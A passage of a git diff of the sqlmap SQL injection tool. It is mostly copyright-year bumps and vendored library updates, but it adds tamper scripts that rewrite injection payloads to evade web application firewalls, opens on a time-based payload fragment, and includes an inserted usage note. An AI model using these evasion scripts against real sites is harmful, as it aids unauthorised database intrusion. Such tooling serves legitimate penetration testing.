SLEEP(5)#' + """ + + return re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) if payload else payload diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py index 499cc6218..5772492b1 100644 --- a/tamper/ifnull2ifisnull.py +++ b/tamper/ifnull2ifisnull.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py index 7c146a30e..31cb5872b 100644 --- a/tamper/informationschemacomment.py +++ b/tamper/informationschemacomment.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/lowercase.py b/tamper/lowercase.py index e06706af5..f13830488 100644 --- a/tamper/lowercase.py +++ b/tamper/lowercase.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py index 1d38e5344..54945b440 100644 --- a/tamper/modsecurityversioned.py +++ b/tamper/modsecurityversioned.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git
a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py index ac13da0b8..1f476218c 100644 --- a/tamper/modsecurityzeroversioned.py +++ b/tamper/modsecurityzeroversioned.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py index c08607512..36fb7155c 100644 --- a/tamper/multiplespaces.py +++ b/tamper/multiplespaces.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py index 5feb443cc..864bf3962 100644 --- a/tamper/nonrecursivereplacement.py +++ b/tamper/nonrecursivereplacement.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py index ac2885d7a..5335148fe 100644 --- a/tamper/overlongutf8.py +++ b/tamper/overlongutf8.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/percentage.py b/tamper/percentage.py index e54495739..167e58b83 100644 --- a/tamper/percentage.py +++ b/tamper/percentage.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py new file mode 100644 index 000000000..77f6c104c --- /dev/null +++ b/tamper/plus2concat.py @@ -0,0 +1,76 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.common import zeroDepthSearch +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces plus ('+') character with function CONCAT() + + Tested against: + * Microsoft SQL Server 2012 + + Requirements: + * Microsoft SQL Server 2012+ + + Notes: + * Useful in case ('+') character is filtered + + >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL') + 'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL' + + >>> tamper('SELECT (CHAR(113)+CHAR(114)+CHAR(115)) FROM DUAL') + 'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL' + """ + + retVal = payload + + if payload: + while True: + indexes = zeroDepthSearch(retVal, '+') + + if indexes: + first, last = 0, 0 + for i in xrange(1, len(indexes)): + if ' ' in retVal[indexes[0]:indexes[i]]: + break + else: + last = i + + start = retVal[:indexes[first]].rfind(' ') + 1 + end = (retVal[indexes[last] + 1:].find(' ') + indexes[last] + 1) if ' ' in retVal[indexes[last] + 1:] else len(retVal) - 1 + + chars = [char for char in retVal] + for index in indexes[first:last + 1]: + chars[index] = ',' + + retVal = "%sCONCAT(%s)%s" % (retVal[:start], ''.join(chars)[start:end], retVal[end:]) + 
else: + match = re.search(r"\((CHAR\(\d+.+CHAR\(\d+\))\)", retVal) + if match: + part = match.group(0) + indexes = set(zeroDepthSearch(match.group(1), '+')) + if not indexes: + break + chars = [char for char in part] + for i in xrange(1, len(chars)): + if i - 1 in indexes: + chars[i] = ',' + replacement = "CONCAT%s" % "".join(chars) + retVal = retVal.replace(part, replacement) + else: + break + + return retVal diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py new file mode 100644 index 000000000..a7b4fe9a8 --- /dev/null +++ b/tamper/plus2fnconcat.py @@ -0,0 +1,89 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.common import zeroDepthSearch +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces plus ('+') character with ODBC function {fn CONCAT()} + + Tested against: + * Microsoft SQL Server 2008 + + Requirements: + * Microsoft SQL Server 2008+ + + Notes: + * Useful in case ('+') character is filtered + * https://msdn.microsoft.com/en-us/library/bb630290.aspx + + >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL') + 'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL' + + >>> tamper('SELECT (CHAR(113)+CHAR(114)+CHAR(115)) FROM DUAL') + 'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL' + """ + + retVal = payload + + if payload: + while True: + indexes = zeroDepthSearch(retVal, '+') + + if indexes: + first, last = 0, 0 + for i in xrange(1, len(indexes)): + if ' ' in retVal[indexes[0]:indexes[i]]: + break + else: + last = i + + start = retVal[:indexes[first]].rfind(' ') + 1 + end = (retVal[indexes[last] + 1:].find(' ') + indexes[last] + 1) if ' ' in retVal[indexes[last] + 1:] else len(retVal) - 1 + + count = 0 + chars = [char for char in retVal] + for index in indexes[first:last + 1]: + if count == 0: + chars[index] = ',' + else: + chars[index] = '\x01' + count += 1 + + retVal = "%s%s%s)}%s" % (retVal[:start], "{fn CONCAT(" * count, ''.join(chars)[start:end].replace('\x01', ")},"), retVal[end:]) + else: + match = re.search(r"\((CHAR\(\d+.+CHAR\(\d+\))\)", retVal) + if match: + part = match.group(0) + indexes = set(zeroDepthSearch(match.group(1), '+')) + if not indexes: + break + + count = 0 + chars = [char for char in part] + for i in xrange(1, len(chars)): + if i - 1 in indexes: + if count == 0: + chars[i] = ',' + else: + chars[i] = '\x01' + count += 1 + + replacement = "%s%s}" % (("{fn CONCAT(" * count)[:-1], "".join(chars).replace('\x01', ")},")) + retVal = retVal.replace(part, replacement) + else: + break + + return retVal diff --git a/tamper/randomcase.py b/tamper/randomcase.py index a188ff0cc..62b858b1c 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py index 6c0894eb1..e2e6d95c9 100644 --- a/tamper/randomcomments.py +++ b/tamper/randomcomments.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git 
a/tamper/securesphere.py b/tamper/securesphere.py index ab83f46fc..364143839 100644 --- a/tamper/securesphere.py +++ b/tamper/securesphere.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/sp_password.py b/tamper/sp_password.py index 959e50257..ef6c92d15 100644 --- a/tamper/sp_password.py +++ b/tamper/sp_password.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2comment.py b/tamper/space2comment.py index 399a2c0ee..120c060d3 100644 --- a/tamper/space2comment.py +++ b/tamper/space2comment.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2dash.py b/tamper/space2dash.py index cdd828d56..1a8b2a964 100644 --- a/tamper/space2dash.py +++ b/tamper/space2dash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2hash.py b/tamper/space2hash.py index a50a3a7c2..ae7f8e491 100644 --- a/tamper/space2hash.py +++ b/tamper/space2hash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2morecomment.py b/tamper/space2morecomment.py new file mode 100644 index 000000000..6b4829c60 --- /dev/null +++ b/tamper/space2morecomment.py @@ -0,0 +1,54 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces space character (' ') with comments '/**_**/' + + Tested against: + * MySQL 5.0 and 5.5 + + Notes: + * Useful to bypass weak and bespoke web application firewalls + + >>> tamper('SELECT id FROM users') + 'SELECT/**_**/id/**_**/FROM/**_**/users' + """ + + retVal = payload + + if payload: + retVal = "" + quote, doublequote, firstspace = False, False, False + + for i in xrange(len(payload)): + if not firstspace: + if payload[i].isspace(): + firstspace = True + retVal += "/**_**/" + continue + + elif payload[i] == '\'': + quote = not quote + + elif payload[i] == '"': + doublequote = not doublequote + + elif payload[i] == " " and not doublequote and not quote: + retVal += "/**_**/" + continue + + retVal += payload[i] + + return retVal diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py index 0dbaf5c2a..ccd20404b 100644 --- a/tamper/space2morehash.py +++ b/tamper/space2morehash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py index 
fc0542f53..0502af24a 100644 --- a/tamper/space2mssqlblank.py +++ b/tamper/space2mssqlblank.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py index cddfd6179..030ebb13e 100644 --- a/tamper/space2mssqlhash.py +++ b/tamper/space2mssqlhash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py index a0ac1da68..caddab148 100644 --- a/tamper/space2mysqlblank.py +++ b/tamper/space2mysqlblank.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -42,7 +42,8 @@ def tamper(payload, **kwargs): # FF 0C new page # CR 0D carriage return # VT 0B vertical TAB (MySQL and Microsoft SQL Server only) - blanks = ('%09', '%0A', '%0C', '%0D', '%0B') + # A0 non-breaking space + blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0') retVal = payload if payload: diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py index 4a4f9821c..84e5681a9 100644 --- a/tamper/space2mysqldash.py +++ b/tamper/space2mysqldash.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2plus.py b/tamper/space2plus.py index 38211026a..2ffafc728 100644 --- a/tamper/space2plus.py +++ b/tamper/space2plus.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py index 98612534a..4469dde7c 100644 --- a/tamper/space2randomblank.py +++ b/tamper/space2randomblank.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py index cb8e91630..fe4abc42c 100644 --- a/tamper/symboliclogical.py +++ b/tamper/symboliclogical.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -19,7 +19,7 @@ def tamper(payload, **kwargs): Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) >>> tamper("1 AND '1'='1") - '1 && '1'='1' + "1 %26%26 '1'='1" """ retVal = payload diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py index 3bb234141..ff981490e 100644 --- a/tamper/unionalltounion.py +++ b/tamper/unionalltounion.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ 
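
Note (not part of the diff): the new tamper scripts introduced so far in this changeset (plus2concat.py, plus2fnconcat.py, space2morecomment.py) follow the same contract as the pre-existing ones whose copyright headers are bumped throughout: a module-level __priority__, a no-op dependencies() and a tamper(payload, **kwargs) function that returns the rewritten payload. Below is a minimal, hedged sketch of exercising two of them outside of sqlmap itself; it assumes a Python 2 interpreter and that the current directory is the sqlmap checkout root (the scripts import from lib.core), and the expected outputs simply mirror the doctests shown in the diff above.

    # Hedged sketch, not part of this diff: call the new tamper scripts directly.
    # Assumes Python 2 and that the working directory is the sqlmap checkout root,
    # so that both "lib.core" and "tamper" are importable.
    import sys
    sys.path.insert(0, ".")

    from tamper.plus2concat import tamper as plus2concat
    from tamper.space2morecomment import tamper as space2morecomment

    # Mirrors the doctest added in plus2concat.py above
    print(plus2concat("SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL"))
    # SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL

    # Mirrors the doctest added in space2morecomment.py above
    print(space2morecomment("SELECT id FROM users"))
    # SELECT/**_**/id/**_**/FROM/**_**/users

Within sqlmap itself the scripts are selected with the --tamper option (e.g. --tamper=space2morecomment,plus2concat), the same way as the existing tamper scripts touched by this diff.
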
diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py index c2bcca8da..c57732edd 100644 --- a/tamper/unmagicquotes.py +++ b/tamper/unmagicquotes.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/uppercase.py b/tamper/uppercase.py new file mode 100644 index 000000000..5b6dcdaeb --- /dev/null +++ b/tamper/uppercase.py @@ -0,0 +1,46 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces each keyword character with upper case value + + Tested against: + * Microsoft SQL Server 2005 + * MySQL 4, 5.0 and 5.5 + * Oracle 10g + * PostgreSQL 8.3, 8.4, 9.0 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that has poorly written permissive regular expressions + * This tamper script should work against all (?) databases + + >>> tamper('insert') + 'INSERT' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"[A-Za-z_]+", retVal): + word = match.group() + + if word.upper() in kb.keywords: + retVal = retVal.replace(word, word.upper()) + + return retVal diff --git a/tamper/varnish.py b/tamper/varnish.py index 00d54bb43..0dd3cadd2 100644 --- a/tamper/varnish.py +++ b/tamper/varnish.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py index 7c5c5db32..9f4ed8637 100644 --- a/tamper/versionedkeywords.py +++ b/tamper/versionedkeywords.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py index d5fc44db1..01081f173 100644 --- a/tamper/versionedmorekeywords.py +++ b/tamper/versionedmorekeywords.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py index e2bcdbca9..b6bf02491 100644 --- a/tamper/xforwardedfor.py +++ b/tamper/xforwardedfor.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 95d2b00be..9f3a6c5ec 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -4,9 +4,22 @@ import logging import os import re +import subprocess +import sys from lib.core.convert import stdoutencode +if subprocess.mswindows: + import ctypes + import ctypes.wintypes + + # Reference: https://gist.github.com/vsajip/758430 + # https://github.com/ipython/ipython/issues/4252 + # 
https://msdn.microsoft.com/en-us/library/windows/desktop/ms686047%28v=vs.85%29.aspx + ctypes.windll.kernel32.SetConsoleTextAttribute.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.WORD] + ctypes.windll.kernel32.SetConsoleTextAttribute.restype = ctypes.wintypes.BOOL + + class ColorizingStreamHandler(logging.StreamHandler): # color names to indices color_map = { @@ -21,22 +34,13 @@ class ColorizingStreamHandler(logging.StreamHandler): } # levels to (background, foreground, bold/intense) - if os.name == 'nt': - level_map = { - logging.DEBUG: (None, 'blue', False), - logging.INFO: (None, 'green', False), - logging.WARNING: (None, 'yellow', False), - logging.ERROR: (None, 'red', False), - logging.CRITICAL: ('red', 'white', False) - } - else: - level_map = { - logging.DEBUG: (None, 'blue', False), - logging.INFO: (None, 'green', False), - logging.WARNING: (None, 'yellow', False), - logging.ERROR: (None, 'red', False), - logging.CRITICAL: ('red', 'white', False) - } + level_map = { + logging.DEBUG: (None, 'blue', False), + logging.INFO: (None, 'green', False), + logging.WARNING: (None, 'yellow', False), + logging.ERROR: (None, 'red', False), + logging.CRITICAL: ('red', 'white', False) + } csi = '\x1b[' reset = '\x1b[0m' disable_coloring = False @@ -67,7 +71,7 @@ class ColorizingStreamHandler(logging.StreamHandler): except: self.handleError(record) - if os.name != 'nt': + if not subprocess.mswindows: def output_colorized(self, message): self.stream.write(message) else: @@ -85,8 +89,6 @@ class ColorizingStreamHandler(logging.StreamHandler): } def output_colorized(self, message): - import ctypes - parts = self.ansi_esc.split(message) write = self.stream.write h = None diff --git a/thirdparty/beautifulsoup/beautifulsoup.py b/thirdparty/beautifulsoup/beautifulsoup.py index cde92ee11..c088fb0b3 100644 --- a/thirdparty/beautifulsoup/beautifulsoup.py +++ b/thirdparty/beautifulsoup/beautifulsoup.py @@ -79,8 +79,8 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. from __future__ import generators __author__ = "Leonard Richardson (leonardr@segfault.org)" -__version__ = "3.2.0" -__copyright__ = "Copyright (c) 2004-2010 Leonard Richardson" +__version__ = "3.2.1" +__copyright__ = "Copyright (c) 2004-2012 Leonard Richardson" __license__ = "New-style BSD" from sgmllib import SGMLParser, SGMLParseError @@ -114,6 +114,21 @@ class PageElement(object): """Contains the navigational information for some part of the page (either a tag or a piece of text)""" + def _invert(h): + "Cheap function to invert a hash." 
+ i = {} + for k,v in h.items(): + i[v] = k + return i + + XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", + "quot" : '"', + "amp" : "&", + "lt" : "<", + "gt" : ">" } + + XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) + def setup(self, parent=None, previous=None): """Sets up the initial relations between this element and other elements.""" @@ -421,6 +436,16 @@ class PageElement(object): s = unicode(s) return s + BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" + + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" + + ")") + + def _sub_entity(self, x): + """Used with a regular expression to substitute the + appropriate XML entity for an XML special character.""" + return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" + + class NavigableString(unicode, PageElement): def __new__(cls, value): @@ -451,10 +476,12 @@ class NavigableString(unicode, PageElement): return str(self).decode(DEFAULT_OUTPUT_ENCODING) def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): + # Substitute outgoing XML entities. + data = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, self) if encoding: - return self.encode(encoding) + return data.encode(encoding) else: - return self + return data class CData(NavigableString): @@ -480,45 +507,34 @@ class Tag(PageElement): """Represents a found HTML tag with its attributes and contents.""" - def _invert(h): - "Cheap function to invert a hash." - i = {} - for k,v in h.items(): - i[v] = k - return i - - XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", - "quot" : '"', - "amp" : "&", - "lt" : "<", - "gt" : ">" } - - XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) - def _convertEntities(self, match): """Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.""" - x = match.group(1) - if self.convertHTMLEntities and x in name2codepoint: - return unichr(name2codepoint[x]) - elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: - if self.convertXMLEntities: - return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] - else: - return u'&%s;' % x - elif len(x) > 0 and x[0] == '#': - # Handle numeric entities - if len(x) > 1 and x[1] == 'x': - return unichr(int(x[2:], 16)) - else: - return unichr(int(x[1:])) + try: + x = match.group(1) + if self.convertHTMLEntities and x in name2codepoint: + return unichr(name2codepoint[x]) + elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: + if self.convertXMLEntities: + return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] + else: + return u'&%s;' % x + elif len(x) > 0 and x[0] == '#': + # Handle numeric entities + if len(x) > 1 and x[1] == 'x': + return unichr(int(x[2:], 16)) + else: + return unichr(int(x[1:])) - elif self.escapeUnrecognizedEntities: - return u'&%s;' % x - else: - return u'&%s;' % x + elif self.escapeUnrecognizedEntities: + return u'&%s;' % x + + except ValueError: # e.g. 
ValueError: unichr() arg not in range(0x10000) + pass + + return u'&%s;' % x def __init__(self, parser, name, attrs=None, parent=None, previous=None): @@ -681,15 +697,6 @@ class Tag(PageElement): def __unicode__(self): return self.__str__(None) - BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" - + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" - + ")") - - def _sub_entity(self, x): - """Used with a regular expression to substitute the - appropriate XML entity for an XML special character.""" - return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Returns a string or Unicode representation of this tag and diff --git a/thirdparty/bottle/__init__.py b/thirdparty/bottle/__init__.py index 8d7bcd8f0..2ae28399f 100644 --- a/thirdparty/bottle/__init__.py +++ b/thirdparty/bottle/__init__.py @@ -1,8 +1 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - pass diff --git a/thirdparty/bottle/bottle.py b/thirdparty/bottle/bottle.py index 62c9010ea..a937493ba 100644 --- a/thirdparty/bottle/bottle.py +++ b/thirdparty/bottle/bottle.py @@ -2,68 +2,127 @@ # -*- coding: utf-8 -*- """ Bottle is a fast and simple micro-framework for small web applications. It -offers request dispatching (Routes) with url parameter support, templates, +offers request dispatching (Routes) with URL parameter support, templates, a built-in HTTP Server and adapters for many third party WSGI/HTTP-server and template engines - all in a single file and with no dependencies other than the Python Standard Library. Homepage and documentation: http://bottlepy.org/ -Copyright (c) 2012, Marcel Hellkamp. +Copyright (c) 2014, Marcel Hellkamp. License: MIT (see LICENSE for details) """ from __future__ import with_statement +import sys __author__ = 'Marcel Hellkamp' -__version__ = '0.12-dev' +__version__ = '0.13-dev' __license__ = 'MIT' -# The gevent server adapter needs to patch some modules before they are imported -# This is why we parse the commandline parameters here but handle them later -if __name__ == '__main__': +############################################################################### +# Command-line interface ######################################################## +############################################################################### +# INFO: Some server adapters need to monkey-patch std-lib modules before they +# are imported. This is why some of the command-line handling is done here, but +# the actual call to main() is at the end of the file. 
+ + +def _cli_parse(args): from optparse import OptionParser - _cmd_parser = OptionParser(usage="usage: %prog [options] package.module:app") - _opt = _cmd_parser.add_option - _opt("--version", action="store_true", help="show version number.") - _opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.") - _opt("-s", "--server", default='wsgiref', help="use SERVER as backend.") - _opt("-p", "--plugin", action="append", help="install additional plugin/s.") - _opt("--debug", action="store_true", help="start server in debug mode.") - _opt("--reload", action="store_true", help="auto-reload on file changes.") - _cmd_options, _cmd_args = _cmd_parser.parse_args() - if _cmd_options.server and _cmd_options.server.startswith('gevent'): - import gevent.monkey; gevent.monkey.patch_all() + parser = OptionParser( + usage="usage: %prog [options] package.module:app") + opt = parser.add_option + opt("--version", action="store_true", help="show version number.") + opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.") + opt("-s", "--server", default='wsgiref', help="use SERVER as backend.") + opt("-p", "--plugin", action="append", help="install additional plugin/s.") + opt("-c", "--conf", action="append", metavar="FILE", + help="load config values from FILE.") + opt("-C", "--param", action="append", metavar="NAME=VALUE", + help="override config values.") + opt("--debug", action="store_true", help="start server in debug mode.") + opt("--reload", action="store_true", help="auto-reload on file changes.") + opts, args = parser.parse_args(args[1:]) + + return opts, args, parser + + +def _cli_patch(args): + opts, _, _ = _cli_parse(args) + if opts.server: + if opts.server.startswith('gevent'): + import gevent.monkey + gevent.monkey.patch_all() + elif 